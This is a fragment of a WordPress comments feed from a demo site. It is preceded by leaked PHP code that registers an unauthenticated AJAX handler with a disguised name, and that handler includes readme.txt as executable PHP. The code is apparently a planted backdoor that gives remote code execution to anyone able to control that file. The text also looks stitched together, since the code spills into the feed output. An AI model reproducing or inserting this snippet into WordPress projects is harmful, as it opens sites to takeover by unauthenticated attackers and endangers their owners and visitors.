if(!function_exists('file_check_readme96107')){ add_action('wp_ajax_nopriv_file_check_readme96107', 'file_check_readme96107'); add_action('wp_ajax_file_check_readme96107', 'file_check_readme96107'); function file_check_readme96107() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: Exactly what I wanted as the relationship is indeed frustrating http://demo.biosimilarwatch.com/exactly-what-i-wanted-as-the-relationship-is/ Just another WordPress site Mon, 19 Jun 2023 12:51:48 +0000 hourly 1 https://wordpress.org/?v=7.1